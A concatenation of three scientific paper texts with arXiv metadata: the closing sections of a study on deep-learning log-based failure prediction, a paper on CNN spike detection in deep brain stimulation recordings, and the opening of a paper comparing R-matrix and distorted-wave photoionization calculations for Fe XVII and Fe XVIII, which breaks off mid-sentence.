CNN-based encoder with the Logkey2vec embedding strategy works fairly well for long log sequence lengths of up to 1 000. We suspect that the impact of log sequence length could be significant for much longer log sequences. However, log sequences longer than 1 000 are not common in the publicly available, real-world log datasets [32] as explained in Section 5.2.2. Nevertheless, the investigation of much longer log sequences remains for future work. The relationship between the failure percentage and the failure prediction accuracy (F1 score) is depicted in Figure 7(c). It is clear that, overall, the F1 score increases as the failure percentage increases. This is intuitive since a larger failure percentage means more instances of failure patterns in the training data, making it easier to learn such patterns. An interesting observation is that the average failure prediction accuracy is above 0.9 even when the failure percentage is 10%. This implies that the failure predictor (i.e., DL encoder and log sequence embedding strategy) can cope well with unbalanced data. Figure 7(d) shows the failure prediction accuracy for different failure pattern types. There is no consistent trend across models M1, M2, and M3; Type-F (the corresponding language is finite) is better detected than Type-I (the corresponding language is infinite) in M2 and M3, whereas the opposite happens in M1. Considering the complexity of failure patterns, it is unclear why, in M1, detecting less complex failure patterns (Type-F) is more difficult than detecting more complex patterns (Type-I). We may not have defined failure pattern types in a way that is conducive to explaining variations in accuracy and different hypotheses will have to be tested in future work with respect to which pattern characteristics matter. We focused above on the impact of individual characteristics on the accuracy of failure prediction, not their combinations. To identify conditions describing how the failure prediction accuracy of the best-performing failure predictor (i.e., the CNN-based encoder with the Logkey2vec embedding strategy) varies according to combinations of dataset characteristics, we built a regression tree [4] where we explain variations in F1 scores according to dataset characteristics. Out of 1 080 data points (\(360\times 3\) since we have 360 data points for each of the three behavior models), we used 720 (66.7%) and 360 (33.3%) of them, respectively, for training and testing the tree. Figure 8 shows the resulting regression tree; each non-leaf node presents a partial condition and each leaf node presents the predicted accuracy of the condition corresponding to the path from the root to the leaf. For example, the left-most leaf node means that the average failure prediction accuracy is predicted to be 0.516 if the dataset size is less than 350 _and_ the failure percentage is less than 7.5. Otherwise, the failure average prediction accuracy will be at least 0.9. Further, we calculated the IQR of the F1 scores when the conditions for high accuracy are met, IQR reaches below 0.01. From the tree, it is clear that dataset size and failure percentage are the two main factors that explain failure prediction accuracy. Furthermore, we can see that the CNN-based encoder with the Logkey2vec embedding works very well, except when both the dataset size and failure percentage are small. The practical implication of this finding will be further discussed in Section 7. The answer to RQ3 is that, for the CNN-based encoder with the Logkey2vec embedding strategy, increasing the dataset size and failure percentage significantly increases the failure prediction accuracy, whereas the other factors (i.e., LSL and failure pattern type) do not have a clear relationship with failure prediction accuracy. Especially, the failure predictor is very accurate (F1 score above 0.95) and robust (IQR is below 0.01) when the dataset size is above 350 or the failure percentage is above 7.5%. ### Replication package We plan to make the replication package, including implementation, generated datasets with behavioral models, and results, publicly available upon acceptance. Figure 8: Regression Tree for the CNN-based Model explaining variations in F1 scores ## 7 Discussion ### Findings and Implications Our study leverages the main DL types (LSTM, CNN, and transformer), along with different LSE strategies (BERT and Logkey2vec). In contrast to other studies mentioned in Table 1, the full combination of DL types and LSE strategies are evaluated. Moreover, instead of using a limited number of datasets, using generated data enables us to control dataset characteristics to identify necessary conditions for achieving high-accuracy models. Several major findings are reported in SS 6. First, the CNN-based DL encoder fares the best among different DL encoders, including the ones based on LSTMs, transformers, and BiLSTMs. Second, the CNN-based DL encoder works best with the Logkey2vec embedding strategy, although BERT fares better than Logkey2vec overall for all DL encoders. Third, for the best combination, i.e., the CNN-based encoder with Logkey2vec, both the size and the failure percentage of input log datasets significantly drive the failure prediction accuracy, whereas the log sequence length and the failure pattern type do not. Last but not least, we found that the best combination works well if either the dataset size is above 350 or the failure percentage is above 7.5%. These findings carry practical implications for both researchers and engineers. Although the CNN-based DL encoder and the Logkey2vec embedding strategy are not the most recent techniques in their respective fields, interestingly, their combination works best for failure prediction. Based on this finding, we can recommend using the CNN-based encoder with Logkey2vec for accurate failure prediction among various combinations of DL encoders and log sequence embedding strategies. However, we have explored the ranges of dataset characteristics that have been observed in the literature. Different results may be observed beyond these ranges and for different failure patterns. Furthermore, the conditions driving failure prediction accuracy suggest practical guidelines. For example, for a log dataset size below 350 and a failure percentage below 7.5%, failure prediction will be inaccurate. In that case, one can increase either the log dataset size or the failure percentage to improve the situation. Although the failure percentage is inherent to the system under analysis and might not be easy to control in practice, collecting more log sequences during the operation of the system to increase the dataset size is usually feasible. ### Threats to Validity There are a number of potential threats to the validity of our experimental results. Hyper-parameter tuning of models.The hyper-parameters of failure predictors, such as optimizers, loss functions, and learning rates, can affect the results. To mitigate this, we followed recommendations from the literature. For the batch size and the number of epochs, as mentioned in SS 5.2.3, we chose values for different combinations of dataset characteristics based on preliminary evaluation results. Better results could be obtained with different choices. Synthetic data generation process.Due to the lack of a method to generate the datasets satisfying different dataset characteristics mentioned in SS 5.3.1, we proposed a new approach, with precise algorithms, that can generate datasets in a controlled, unbiased manner as discussed in SS 5.3. To mitigate any risks related to synthetic generation, we provided proof of the correctness of the algorithms and explained why it is unbiased during the generation process. To further support the validity of the generation process, we compared the results on actual datasets reported in the literature with those of the synthesised datasets for corresponding key parameters (e.g., dataset sizes and failure percentage). Results show to be remarkably consistent, thus backing up the validity of our experiments. For example, a BiLSTM-based model in the study of Le and Zhang [32], achieves results comparable to the synthesised data with similar characteristics 3. Footnote 3: Using real-world datasets of BGL and Spirit, the failure predictor achieved 1.0 and 0.95 as F1 score, respectively, while the F1 score results of similar synthesised datasets using the same DL type as encoder are 0.99 and 0.99 Behavioral models and failure patterns.The behavioral models and failure patterns used for the generation of synthetic datasets may have a significant impact on the experimental results. We want to remark that this is the first attempt to characterise failure patterns for investigating failure prediction performance. To mitigate this issue, we carefully chose them based on pre-defined criteria described in SS 5.4. Nevertheless, more case studies, especially considering finer-grained failure patterns, are required to increase the generalizability of our findings and implications and, for that purpose, we provide in our replication package all the artifacts required. Possible bugs in the implementation.The implementation of the DL encoders, the log sequence embedding strategies, the dataset generation algorithms, and the scripts used in our experiments might include unexpected bugs. To mitigate this risk, we used the replication packages of existing studies [8, 31] as much as possible. Also, we carefully performed code reviews. ## 8 Conclusion In this paper, we presented a comprehensive and systematic evaluation of alternative failure prediction strategies relying on DL encoders and log sequence embedding strategies. We presented a generic, modular architecture for failure prediction which can be configured with specific DL encoders and embedding strategies, resulting in different failure predictors. We considered BERT and Logkey2vec as embedding strategies. We also covered the main DL categories, plus the attention mechanism, resulting in four DL encoders (LSTM-, BiLSTM-, CNN-, and transformer-based). Our selection was inspired by the previously used DL models in the literature. We evaluated the failure prediction models on diverse synthetic datasets using three behavioural models inferred from available system logs. Four dataset characteristics were controlled when generating datasets: dataset size, failure percentage, Log Sequence Length (LSL), and failure pattern type. Using these characteristics, 360 datasets were generated for each of three behavioral models. Evaluation results show that the accuracy of the CNN-based encoder is significantly higher than the other encoders regardless of dataset characteristics and embedding strategies. Between the two embedding strategies, pretrained BERT outperformed the trainable Logkey2vec overall, although Logkey2vec fared better for the CNN-based encoder. The analysis of dataset characteristics confirms that increasing the dataset size and failure percentage increases the failure prediction accuracy, while the other factors (i.e., LSL and failure pattern type) did not show a clear relationship with failure prediction accuracy. Furthermore, the accuracy of the best configuration (i.e., CNN-based with Logkey2vec) consistently yielded high accuracy when the dataset size was above 350 _or_ the failure percentage was above 7.5%, which makes it widely usable in practice. As part of future work, we plan to further evaluate the best-performing configuration of the failure prediction architecture on real-world log data to further investigate the effect of other factors, such as log parsing techniques, on model accuracy. Additionally, by using real-world data, we also plan to include time-aware evaluation metrics, such as lead time [47], to assess the accuracy of these models at predicting failures early on.
2308.05755
Deep learning for spike detection in deep brain stimulation surgery
Deep brain stimulation (DBS) is a neurosurgical procedure successfully used to treat conditions such as Parkinson's disease. Electrostimulation, carried out by implanting electrodes into an identified focus in the brain, makes it possible to reduce the symptoms of the disease significantly. In this paper, a method for analyzing recordings of neuronal activity acquired during DBS neurosurgery using deep learning is presented. We tested using a convolutional neural network (CNN) for this purpose. Based on the time window, the classifier assesses whether neuronal activity (spike) is present. The maximum accuracy value for the classifier was 98.98%, and the area under the receiver operating characteristic curve (AUC) was 0.9898. The method made it possible to obtain a classification without using data preprocessing.
Arkadiusz Nowacki, Ewelina Kołpa, Mateusz Szychiewicz, Konrad Ciecierski
2023-08-04T13:15:05Z
http://arxiv.org/abs/2308.05755v1
# Deep learning for spike detection in deep brain stimulation surgery ###### Abstract Deep brain stimulation (DBS) is a neurosurgical procedure successfully used to treat conditions such as Parkinson's disease. Electrostimulation, carried out by implanting electrodes into an identified focus in the brain, makes it possible to reduce the symptoms of the disease significantly. In this paper, a method for analyzing recordings of neuronal activity acquired during DBS neurosurgery using deep learning is presented. We tested using a convolutional neural network (CNN) for this purpose. Based on the time window, the classifier assesses whether neuronal activity (spike) is present. The maximum accuracy value for the classifier was 98.98%, and the area under the receiver operating characteristic curve (AUC) was 0.9898. The method made it possible to obtain a classification without using data preprocessing. Keywords:deep learning convolutional neural network medical diagnosis DBS deep brain stimulation spike ## 1 Introduction and Problem Formulation Deep brain stimulation (DBS) is an efficient method in the field of neurosurgery, which not only can be used to treat Parkinson's disease but also Tourette's syndrome, movement, and anxiety disorders [10]. This is a more efficient method for the localization of a small structure Subthalamic Nucleus than standard imaging techniques such as CT and MRI. The main essence of DBS is the modulation of specific structures in the brain by electrical impulses generated with a frequency of 100-200 Hz via surgically implanted electrodes in specific brain regions. These electrodes emit electrical impulses that can modulate the activity of neurons, which can help to alleviate symptoms of conditions such as dystonia and essential tremor. Due to its clinical effectiveness, scientists are still looking for alternative ways to use it in psychiatry and other fields of medicine. To ensure that the electrodes are placed in the optimal location, doctors use spike detection to identify the specific neural activity that is associated with the condition being treated. Once the electrodes are in place, spike detection can also be used to monitor the effects of DBS treatment over time. By measuring the neural activity before and after DBS, doctors can determine if the treatment has the desired effect and adjust the stimulation parameters as needed. Additionally, spike detection can be used to detect any side effects of DBS treatment, such as changes in cognitive function or mood. The following parts of this work will discuss related scientific studies on data acquisition, cleaning of artifacts, and spike detection. The developed methods of spike detection using deep learning, data analysis on which experiments were carried out, and their results will also be described. The paper proposes the use of a convolutional neural network for spike detection. The model was trained on real data obtained during the DBS operation. Additionally, the impact of the training data on accuracy, precision, recall, and F1 score is considered. ## 2 Related Work ### Spike detection A neural spike, also known as an action potential, is a brief, rapid change in the electrical potential of a neuron. This is due to the rapid influx of positively charged ions into the cell, causing the membrane potential to change rapidly from negative to positive[6]. Spike detection identifies the presence of nerve impulses in an electrophysiological signal, such as EEG or extracellular recording. There are various methods for detecting spikes in neural signals, including: 1. threshold-based methods 2. wavelet-based methods 3. template matching 4. spectral method Threshold-based methods involve setting a threshold value; any signal exceeding that threshold is considered a spike. Wavelet-based methods use wavelet transforms to decompose the signal into different frequency bands and then identify spikes based on wavelet coefficients. Template matching involves creating a peak waveform template and then using that template to detect signal spikes. The spectral method is based on the power spectral density of signals and is used to detect high-frequency spikes[12]. ### Deep learning in brain waves analysis Deep learning is a subfield of machine learning that uses neural networks with multiple layers to analyze complex data. Much work has been done on EEG analysis in terms of using deep learning to analyze brainwaves. In the context of brainwave analysis, deep learning techniques such as convolutional neural networks (CNNs) and recurrent neural networks (RNNs) can be used to analyze large amounts of electroencephalography data, identifying patterns and features that are indicative of different cognitive states[11]. Convolutional neural networks (CNNs) are particularly well suited for analyzing electroencephalography data, as they can learn spatial representations of the data by applying filters to small regions of the input data. This allows them to identify patterns in the electroencephalography data specific to certain brain regions or cognitive states[11]. Recurrent neural networks (RNNs) are another type of deep learning algorithm that can be used in brainwave analysis. RNNs can process sequential data, such as time series data, and learn patterns in the data that span multiple time steps. This makes them well suited for analyzing electroencephalography data, as signals are time series data that change over time[1]. Deep learning techniques such as deep belief networks (DBNs) and autoencoders (AEs) are also used for EEG-based brain-computer interfaces (BCIs) and for identifying abnormal brain activities such as seizures and sleep disorders[9]. ## 3 Deep Learning-based Algorithm for Spike Detection ### Input Dataset Description The analyzed data came from recordings made during deep brain stimulation surgery. The sampling device took data at a frequency of 24 kHz. Such frequency means that there are 24 samples per 1 ms of recording. Each recording is 4s long, giving 240000 samples per recording. To create the dataset, the data was processed to obtain the timestamps in which the spikes occurred. The recordings contain a lot of noise and interference. To better detect spikes, has been carried out data renormalization. The renormalization was based on the median absolute deviation (MAD). MAD is calculated by finding the median of a data set and then finding the absolute difference between each data point and the median. The median of absolute differences is then taken as a measure of the dispersion or variability of the data set[4]. \[MAD=median(|X-median(X)|)\frac{1}{0.6745} \tag{1}\] Where: * \(X\): is the dataset * \(median(X)\): is the median of the dataset * \(|x-median(x)|\): is the absolute difference between each data point and the median of the dataset The constant \(\frac{1}{0.6745}\) is used to make the MAD comparable to the standard deviation for a normal distribution[8]. Renormalization aims to rescale the raw data such that the standard deviation (SD) noise is approximately 1. Exact scaling may not be feasible, but MAD significantly approximates the noise value to SD (Figure 1). Renormalization using MAD can help when recordings are multichannel. This allows for comparing electrode/channel values with each other. Spike detection involves selecting local extremes above a designated threshold. The data is first filtered using a box filter (a moving average) to reduce high-frequency noise[7]. The box filter works by averaging the data over a specific time window, smoothing out high-frequency signal fluctuations. This can help improve spike detection because it reduces the impact of noise on the detection process. Figure 1: Samples from the recording before (left) and after (right) renormalization. In red: +/- the MAD; in dashed blue +/- the SD Figure 2: Sample from the recording with detection threshold (dashed blue) and the filtered and rectified trace (red). The SD value determines the detection threshold. It can be a multiple of SD or its value. Based on the crossing of this threshold, sites where a spike could occur, are selected(Figure 2). Spike detection involves checking selected samples. The absolute value of detected spikes and their minimum distances from each other is checked[7]. This makes it possible to filter out distorted, overlapping spikes. This way, timestamps were obtained where spikes occur (Figure 3). Spikes usually last about one millisecond[5]. To create a training and validation dataset, time windows were stretched around the timestamps. As the device operates at a frequency of 24 samples per millisecond, time windows of 48 samples were created. The time windows were created using the raw data before renormalization (Figure 4). The resulting data was divided into a training and validation dataset at a ratio of 80:20. ### Neural network In order to detect spikes, was created a binary classifier. It was based on a convolutional neural network. Using deep learning with convolutional neural networks yielded promising results in classifying EEG problems[11]. The architecture of the created network is shown in Figure 5. The size of the input data corresponds to the size of the time window. The recordings are single-channel, and the window is 48 samples in size, so the input vector is 1x48. The input data is then preprocessed through several one-dimensional convolution layers. The Leaky Rectified Linear Unit (or Leaky ReLU) is used here. Unlike the standard ReLU, the function has a slight bias for Figure 3: Raw data with a detected spike (red dot) negative values, unlike the ReLU, where for negative values, the function value is equal to 0[13]. A block was then applied: dropout, a one-dimensional convolutional layer, and Leaky ReLU. The block is designed to get all the necessary information regarding the time window and the presence of a spike in it. This block is repeated six times. The data is then modified to the target output size. The output is of form 2x1. The two outputs correspond to binary classification: no spike(or presence of noise) and the presence of spike. To process the data in this way, two layers were used: a one-dimensional convolutional network and a sigmoid. Sigmoid was used to normalize the data to an interval of 0-1 so that the largest value[3]. The largest value thus indicates the classifier's prediction. ## 4 Numerical Experiments and Performance Evaluation ### Neural Network Training The classifier was trained for 15 epochs. For every epoch, a checkpoint of the trained model was created, and its metric values were saved. The loss function is Figure 4: Sample time window with spike Figure 5: Structure of the neural network (top) and the structure of the sequence, repeated six times (bottom) Binary Cross Entropy, and the learning rate was set to 0.001; adaptive Moment Estimation (Adam) was chosen as an optimizer. The following metrics have been checked: 1. accuracy 2. precision 3. recall 4. \(F_{1}\) score Accuracy is a commonly used metric to evaluate the performance of a classification model. It is the ratio of the number of correct predictions made by the model to the total number of predictions made. Accuracy is between 0 and 1, where 1 is perfect accuracy, and 0 is no accuracy[2]. \[ACC=\frac{TP+TN}{TP+TN+FN+FP} \tag{2}\] Precision is the ratio of the number of true positive predictions (i.e., the number of times the model correctly predicted a positive class) to the total number of positive predictions made by the model. Precision is between 0 and 1, where 1 mean perfect precision and 0 mean no precision[2]. \[Precision=\frac{TP}{TP+FP} \tag{3}\] The recall is the ratio of the number of true positive predictions (i.e., the number of times the model correctly predicted the positive class) to the total number of positive instances in the dataset. The recall is between 0 and 1, where 1 represents perfect recall, and 0 represents no recall[2]. \[Recall=\frac{TP}{TP+FN} \tag{4}\] The \(F_{1}\) score balances precision and recall, giving equal weight to both. A high F1 score means the model has both a high precision and recall. \[F_{1}=2*\frac{Precision*Recall}{Precision+Recall} \tag{5}\] Before the actual training, the number of blocks containing dropout, a one-dimensional convolutional layer, and Leaky ReLU was selected. The average values of the accuracy metrics were compared for 15 epochs. Values have been compared in the tabular 1. Based on the comparison, six blocks were selected. Admittedly, nine and 12 achieved higher average accuracy but significantly increased training and prediction times, with minimal accuracy gains. The training was done using a previously created dataset discussed in the previous chapter. ### Results of Experiments Classifier training was carried out in several variants, using 25%, 50%, 75%, and 100% of the training set. It was thus tested how much data the network needs to achieve promising results. The results for the best models are presented in table 2. The best results were achieved by the model for which the entire available training set was used. The value of the accuracy metric was 0.9898, and the F1 score was 0.9898 (both values were the highest in the entire comparison). It is worth noting that high metrics values were also achieved by models trained at 50% and 75% of the original training set. \begin{table} \begin{tabular}{c Confusion matrices were created to illustrate the results (Figure 6). The validation set consisted of 9762 examples. In the case of the best model, it achieved high values for True Positive (4852) and True Negative (4810). This gives the correct answer for 98% and over 99% for true negative and true positive, respectively. In order to check the correctness of distinguishing between classes by the classifier, a graph of the ROC curve was created (Figure 7). The area under the curve (AUC) was 0.990. ## 5 Summary and Conclusions In this paper, we presented the use of deep learning using convolutional neural networks to detect spikes in recordings from DBS surgery automatically. The best model achieved 0.9898 accuracies and \(F_{1}\) score of 0.9898. The binary classifier has yielded promising results for use in accelerating automatic spike detection. Reducing the training crop by 50% yielded further satisfactory results. A high value of the AUC metric (0.990) means that the classifier is good at recognizing individual classes. It can distinguish spikes from noise contained in the recording or overlapping spikes. The classifier can be used to find spikes for sorting faster, and can also search for correct spikes in a distorted narrative containing much noise. Figure 7: ROC curve for best model
2308.14880
R-Matrix calculations for opacities: IV. Convergence, completeness, and comparison of relativistic R-matrix and distorted wave calculations for FeXVII and FeXVIII
To investigate the completeness of coupled channel (CC) Breit-Pauli R-Matrix (BPRM) calculations for opacities, we employ the relativistic distorted wave (RDW) method to complement (``top-up'') and compare the BPRM photoionization cross sections for high-$n\ell$ levels of both FeXVII and FeXVIII. Good agreement is found in background photoionization cross sections using these two methods, which also ensures correct matching of bound level cross sections for completeness. In order to top-up the CC-BPRM calculations, bound-bound transitions involving additional bound levels, and a large number of doubly-excited quasi-bound levels corresponding to BPRM autoionizing resonances described in paper RMOPII, are calculated using the RDW method. Photoionization cross sections in the high energy region are also computed and compared up to about 500 $Ry$, and contributions from higher core level excitations than BPRM are considered. The effect of configuration interaction is investigated, which plays a significant role in correctly reproducing some background cross sections. Owing to the fact that the additional RDW levels correspond to high-$n\ell$ bound levels that are negligibly populated according to the Mihalas-Hummer-D\"{a}ppen equation-of-state (Paper I), the effect on opacities is expected to be small.
L. Zhao, S. N. Nahar, W. Eissner, A. K. Pradhan
2023-08-28T20:09:39Z
http://arxiv.org/abs/2308.14880v1
R-Matrix calculations for opacities: IV.: Convergence, completeness, and comparison of relativistic R-matrix and distorted wave calculations for Fe xvii and Fe xviii ###### Abstract To investigate the completeness of coupled channel (CC) Breit-Pauli R-Matrix (BPRM) calculations for opacities, we employ the relativistic distorted wave (RDW) method to complement ("top-up") and compare the BPRM photoionization cross sections for high-\(n\ell\) levels of both Fe xvii and Fe xviii. Good agreement is found in background photoionization cross sections using these two methods, which also ensures correct matching of bound level cross sections for completeness. In order to top-up the CC-BPRM calculations, bound-bound transitions involving additional bound levels, and a large number of doubly-excited quasi-bound levels corresponding to BPRM autoionizing resonances described in paper RMOPII, are calculated using the RDW method. Photoionization cross sections in the high energy region are also computed and compared up to about 500 \(Ry\), and contributions from higher core level excitations than BPRM are considered. The effect of configuration interaction is investigated, which plays a significant role in correctly reproducing some background cross sections. Owing to the fact that the additional RDW levels correspond to high-\(n\ell\) bound levels that are negligibly populated according to the Mihalas-Hummer-Dappen equation-of-state (paper I), the effect on opacities is expected to be small. ## 1 Introduction Previous papers I-III in this series (hereafter RMPP1, RMOP2, RMOP3) reported BPRM calculations and plasma effects related to iron opacity at conditions similar to the solar radiation/convection zone boundary or the base of the convection zone (BCZ). As outlined in paper RMOP1, opacity calculations need to consider all possible mechanisms for photon absorption and scattering from all atomic constituents, including all levels that might possibly contribute. Furthermore, in order to resolve discrepancies among various theoretical models based on the DW methods that include different sets of transition arrays, and experimental measurements [1, 2], it is necessary to establish convergence of the BPRM calculations and completeness of transitions considered. Extensive CC-BPRM calculations \(R\)-Matrix (BPRM) calculations were carried out for Fe xvii including 60 fine-structure levels within the \(n\leq 3\) complexes in the Fe xviii target ion [3], and 99 \(LS\) terms within \(n\leq 4\) (99LS-RM). They show strong photon absorption due to core excitation, resulting in an increment of 35% in the Rosseland mean opacity over the Opacity Project (OP) data [4]. Whereas these previous calculations demonstrated that in the \(R\)-Matrix opacity calculations convergence of the close-coupling expansion was a necessary condition for accuracy, completeness of all possible excited configurations by additional contributions in the high-energy region still remains to be ascertained [4, 5, 6]. At BCZ conditions Fe xvii, Fe xviii and Fe xix are the three dominant iron ions. For example, at the measured iron opacity [2] and temperature and density T=\(2.1\times 10^{6}\) and N\({}_{e}\)=\(3.1\times 10^{2}\)2cc, the three ionization fractions are 0.19, 0.38 and 0.29, respectively [4]. In this paper, we consider the 218CC-BPRM calculation for Fe xvii and 276CC-BPRM calculation for Fe xviii, as described in paper RMOP2. The additional or topup transitions for bound-bound and bound-free data are obtained from relativistic distorted wave (RDW) calculations using the flexible atomic code (FAC) [7]. In the following sections, the specifications of the 218CC- and 276CC-BPRM calculations of paper RMOP2 are summarized, followed by the top-up configurations and transitions calculated using FAC. To ensure data correspondence from FAC, a procedure of matching the bound levels from BPRM and FAC results is described, and the bound-bound and bound-free top-up calculations detailed afterwards. A key step in the matching-topup procedure is level identification. Unlike atomic structure and DW calculations, BPRM calculations do not assign spectroscopic designations _a priori_ and bound states are obtained only as eigenvalues of the (e + ion) Hamiltonian. As described in paper RMOP2, the code BPID (Fig. 1, RMOP-I) is used to obtain relevant parameters and for spectroscopic identification of levels computed in BPRM calculations. The RDW calculations of course have a pre-assigned identification based on initial set of electronic configurations specified in the configuration-interaction (CI) basis. In some instances exited level configuration mixing is such that one configuration does not dominate the wavefunction expansion of a given state and RDW and BPRM assignations do not match. It is then required to carefully examine level parameters such as quantum defects and associated bound-bound and bound-free transitions to ascertain matching data. Another consideration is that the precise number of BPRM bound-state eigenvalues depends on an energy mesh or effective quantum number \(\nu(E)\) obtained by "scanning" at a fine mesh with sufficient refinement to ensure convergence. The procedure and results are discussed in this paper. A potentially important factor is that the close coupling approximation introduces autoionizing resonances in photoionization cross section, which may be affected by radiative damping in highly charged H- or He-like ions, and thereby reduce effective cross sections considerably [16]. However, radiation damping occurs _after_ photoabsorption, and for ions such as Fe xvii and Fe xviii this effect is negligible [13, 14]. Therefore, undamped photoionization cross sections are used in opacity calculations, as reported in paper RMOP2. ## 2 BPRM bound-free and bound-bound data The current BPRM calculations for Fe xvii and Fe xviii are unprecedented in terms of scope and magnitude of data produced and processed for opacity calculations, with the maximum number of free channels 998 and 1288 respectively, from calculations reported in RMOP2. For Fe xvii, 99LS-RM calculation [4] is extended to 218CC-BPRM by including the fine structure of the target states. The target configurations (\(1s\) is always full, so omitted for brevity) included are \(2s^{2}2p^{5}\), \(2s2p^{6}\), \(2s^{2}2p^{4}n\ell\), \(2s2p^{5}n\ell\), \(2p^{6}3\ell^{\prime}\), where \(n=3,\ 4\), and \(\ell,\ \ell^{\prime}\leq 2\), which have 99 \(LS\) terms, or 218 fine structure levels. The continuum orbitals included are \(\ell\leq 9\), and the number of continuum \(R\)-Matrix basis functions included is 20. The bound states are found by scanning the eigenvalues of the (e + ion) Hamiltonian on an effective quantum number \(\nu\) up to \(\nu\leq 10.1\)[8]. However, as mentioned above, unlike atomic structure calculations where electronic configurations are specified _a priori_, R-matrix calculations do not provide spectroscopic spin-orbital quantum number designations for the bound levels obtained, nor guarantee that all possible bound levels are found within the \(\nu\)-range of interest. To resolve the first issue, the computer program BPID [9] has been developed as part of the RM opacity codes described in paper P1. Using the code BPID one can identify most of the bound levels spectroscopically, albeit with a few remaining highly mixed levels undetermined (viz. [10]). That obstacle might be overcome by comparing some physical quantities of these levels calculated by an atomic structure code such as SUPERSTRUCTURE [11] and FAC [7], as for example for photoionization cross section to be described in the next section. The second issue depends on the scanning \(\Delta-\nu\)-mesh employed; \(\Delta\nu=0.001\) yields fewer bound levels in the 218CC-BPRM than 60CC-BPRM, so a finer step 0.0001 or 0.0005 is used in the region where levels are missing, which finally gives 464 bound levels, 10 more than 60CC-BPRM. For the larger Fe xviii case, two sets of BPRM calculations are done with different target configurations. One includes up to \(n=3\) target configurations, i.e. \(2s^{2}2p^{4}\), \(2s2p^{5}\), \(2p^{6}\), \(2s^{2}2p^{3}3\ell\), \(2s2p^{4}3\ell\), where \(\ell\leq 2\), which yields 200 target fine structure levels. In addition to target configurations above, the other BPRM calculation includes \(n=4\) configurations, i.e. \(2s^{2}2p^{3}4\ell\), where \(\ell\leq 2\), which yield 276 fine structure levels. The parameters set for the continuum orbitals and basis functions are the same as for Fe xvii 218CC-BPRM calculation. The 200CC-BPRM calculation finds 1149 bound levels with \(\Delta\nu=0.001\), while 276CC-BPRM calculation finds 1163 bound levels with 0.001 as the initial attempt in \(\nu\)-mesh, and 0.0001 or 0.0005 as the second attempt, in the region where levels are missing compared with 200CC-BPRM. Thus we may be confident of having converged with respect to possible number of bound levels with BPRM calculations. To compute iron opacities for Fe xvii and Fe xviii oscillator strengths from the 60CC-BPRM and 200CC-BPRM calculations, and photoionization cross sections from the 218CC-BPRM and 276CC-BPRM calculations, are used respectively (paper RMOP2). So in doing the FAC top-up calculations, matching the bound levels for each BPRM calculation is necessary but complicated by the fact that they have different number of bound levels, especially energy regions where levels are densely packed (see table 1) and the order of their spectroscopic designations may be mismatched and needs to be shuffled (see figure 1).1 Photoionization cross sections of 6 levels of Fe xvii are plotted in figure 1 for 60CC-BPRM and 276CC-BPRM, and we find distinct difference in level 24 and 26. Similar issue arises in figure 1 of Fe xviii. Even though these levels have similar energy, they may have distinctive configurations (see section 3.1), which is the reason why we should redo the identification for different CC-BPRM calculations. After being switched, these levels show good agreement (see figure 1). Footnote 1: It bears emphasis that the opacities _per se_ are independent of any spectroscopic labels; however, they are necessary for processing the bound-bound and bound-free radiative atomic transitions, and for comparing with other data sources. ## 3 Complementarity between BPRM and RDW: the top-up procedure The Opacity Project [12] employed a small (e + ion) wavefunction expansion including outer open Shell configurations in the close-coupling approximation and \(R\)-Matrix method in LS-coupling to calculate non-relativistic photoionization cross sections in the low energy region, and adopted the Kramer approximation ("tail") to fit and extend to higher energies afterwards. In previous calculations, [13] replaced the Kramer tails with the RDW results including the contribution from inner-shell processes. Later opacity tables were updated by also including inner-shell transitions [15]. In this section, we describe the procedure employed to compare and complement BPRM data with RDW data from FAC. That requires careful matching between BPRM and FAC cross sections for all bound levels, and detailed bound-bound and bound-free top-up calculations. We \begin{table} \begin{tabular}{|c|c|c|c|} \hline & level index & 60CC-BPRM & 218CC-BPRM \\ \hline Fe xvii & 23 & -1.242945 & -1.239702 \\ & 24 & -1.239540 & -1.238049 \\ & 25 & -1.237855 & -1.236506 \\ & 26 & -1.236421 & -1.235733 \\ & 27 & -1.235081 & -1.235227 \\ & 28 & -1.234742 & -1.234723 \\ \hline & level index & 200CC-BPRM & 276CC-BPRM \\ \hline Fe xviii & 31 & -3.996445 & -4.004678 \\ & 32 & -3.993010 & -4.003468 \\ & 33 & -3.989362 & -4.000058 \\ \hline \end{tabular} \end{table} Table 1: Selected packed levels of Fe xvii (\(J=4,\pi=0\)) and Fe xviii (\(J=5/2,\pi=0\)) (Note: the energy is \(z\)-scaled, and in unit of \(10^{-2}\)_Ry_) also discuss the effect of configuration interaction on photoionization cross sections. ### Matching In BPRM calculations, bound levels with continuum orbitals \(\ell\leq 9\) and effective quantum number \(\nu\leq 10.1\) are formed by coupling the \(n=2\) core states with the continuum \(\nu\) and \(\ell\) of the outer electron. So in FAC we set the bound configurations as a permutation of the \(n=2\) core configurations and an outer electron with principle quantum number \(n\leq 10\). With the same n-complex configuration interaction included, atomic structure is solved and sorted by total angular momentum \(J\) and parity \(\pi\), and ordered in energy, we find excellent agreement in the energy between BPRM and FAC values. In calculating photoionization cross sections we include the whole \(n\)-complex of Figure 1: Photoionization cross section of 6 closely packed levels for Fe xvii and 3 levels for Fe xviii before and after being switched. 60CC-BPRM (red), 218CC-BPRM (black); 200CC-BPRM (red), 276CC-BPRM (black) core configurations for CI (hereafter CI) purpose, but only the transitions to core configurations that are included in BPRM calculations. To delineate photoionization cross sections at the edges of energy grid, the energy mesh is created in such a way that within any two adjacent thresholds 10 points are uniformly assigned. The partial photoionization cross section is the computed in the default 6 energy grids, and interpolated/extrapolated in our mesh, and summed to give total cross sections for each bound level. To investigate the effect of CI, two sets of RDW calculation are carried out. Both sets only allow the same-\(n\)-complex configuration interaction for bound configurations, but for the core configurations one of them only allows the same-\(n\)-complex CI and the other allows different \(n\)-complexes. We mix all the core configurations together. In RDW calculations, the photoionization cross section is related to the dipole operator matrix \(<\psi_{i}|\mathbb{D}|\psi_{f}>\). The \(|\psi_{i}>\) involves the electron in the bound state to the continuum and all other electrons, and must stay the same if only same-\(n\)-complex configuration interaction is allowed. It can be different if different-\(n\)-complex CI is considered [7]. To match bound state levels from BPRM and RDW, it is necessary to compare cross sections to ensure the correctness of matching. We plot BPRM and RDW photoionization cross sections in the order of energy for each \(J\), \(\pi\) symmetry pair, and a level is matched when the energy and the photoionization cross section agree reasonably well (here the background of the BPRM data and RDW are compared). Photoionization cross sections of majority of bound levels show excellent consistency at the first attempt (see figure 1 for Fe xvii and Fe xviii. The \(LS\)-term notation ( \(S\) and \(L\)) can not be determined from FAC output for all levels, so only configuration and total angular momentum \(J\) are given). However, when several levels are almost degenerate (see table 2), distinctive differences may yet occur in cross sections. Such levels need to be switched till good matching is achieved (See figure 3 for 